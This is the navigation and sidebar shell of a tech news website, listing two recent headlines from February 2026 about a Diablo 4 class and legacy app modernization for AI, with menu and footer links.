  • Tech News

Recent News

Diablo 4 Lord of Hatred’s latest class is the Warlock

Diablo 4 Lord of Hatred’s latest class is the Warlock

February 11, 2026
Legacy Utility Modernization for AI Clever Apps

Legacy Utility Modernization for AI Clever Apps

February 11, 2026
  • About Us
  • Privacy Policy
  • Disclaimer
  • Contact Us

© 2025 https://techtrendfeed.com/ - All Rights Reserved

No Result
View All Result
  • Home
  • Tech News
  • Cybersecurity
  • Software
  • Gaming
  • Machine Learning
  • Smart Home & IoT

© 2025 https://techtrendfeed.com/ - All Rights Reserved